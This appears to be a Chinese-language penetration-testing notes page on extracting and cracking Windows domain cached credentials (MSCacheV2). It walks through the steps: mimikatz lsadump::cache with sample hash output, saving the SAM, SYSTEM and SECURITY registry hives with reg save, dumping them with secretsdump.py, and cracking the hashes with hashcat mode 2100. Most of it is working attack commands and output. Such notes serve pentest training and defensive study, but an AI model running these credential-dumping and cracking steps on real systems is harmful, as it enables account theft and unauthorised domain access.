域缓存凭据爆破

域缓存凭据

在安全配置单元文件中，存储了上次登录计算机时使用的域用户凭据，称为域缓存凭据(DCC)

当未能与域控制器连接或与域控制器连接失效时，计算机任然可以对用户进行身份验证，这些凭据是MSCACHEV2/MSCASH哈希值，不是NTLM hash，不能用于pass the hash攻击，但是可以尝试爆破

可以通过reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CachedLogonsCount查看缓存登录会话的次数，默认为10（可以为0-50），当第11个用户登录该系统时，前面的会话将被覆盖

域缓存凭据获取及爆破

使用mimikatz获取

需要system权限

privilege::debug
lsadump::cache

mimikatz # lsadump::cache
Domain : ICE
SysKey : f18dfacb52083d169d9af9bef2803ebb

Local name : ICE ( S-1-5-21-3415465234-765180626-2808229755 )
Domain name : FBI ( S-1-5-21-124841762-3349575232-3850797422 )
Domain FQDN : fbi.gov

Policy subsystem is : 1.18
LSA Key(s) : 1, default {f2e540bd-5dbc-e9e2-f458-86a771ee56fb}
  [00] {f2e540bd-5dbc-e9e2-f458-86a771ee56fb} 096ada796da65e5dc26c97ed5ef5c2435a96f1f30170f5e8770fc0ca41303245

* Iteration is set to default (10240)

[NL$1 - 2023/4/12 16:39:13]
RID       : 00000a2a (2602)
User      : FBI\test1
MsCacheV2 : 81e72b78c2e11576a9d18e7535c1650e

[NL$2 - 2023/4/6 21:53:28]
RID       : 000001f4 (500)
User      : FBI\Administrator
MsCacheV2 : c9bcdd89254c8aba2528d4f4727bb77b

[NL$3 - 2023/4/12 16:37:14]
RID       : 00000e1e (3614)
User      : FBI\token_test
MsCacheV2 : b8d9eb3fb64ce35960d33216a7c5b1a7

使用reg save保存配置单元文件的副本

管理员权限即可

reg save HKLM\SYSTEM system.bin
reg save HKLM\SECURITY security.bin
reg save HKLM\SAM sam.bin
# 将三个文件保存移到kali

secretsdump.py -system system.bin -security security.bin -sam sam.bin  LOCAL
# 其实只需要system.bin和security.bin即可，但是多一个sam.bin就多了本地用户的hash

爆破

hashcat中Domain Cached Credentials (DCC), MS Cache 对应1100，Domain Cached Credentials 2 (DCC2), MS Cache 2对应2100

如果是mimikatz获取的把拼接为$DCC2$10240#<username>#<MS Cache 2 hash>样式，即上图secretsdump.py获取的样式

将其保存到hash.txt中使用hashcat爆破

hashcat -m 2100 hash.txt pwd.txt --force

字典里有就可以爆破成功

Previous凭据获取 NextDCSync

Last updated 2 years ago

hashtag域缓存凭据

hashtag域缓存凭据获取及爆破

域缓存凭据

域缓存凭据获取及爆破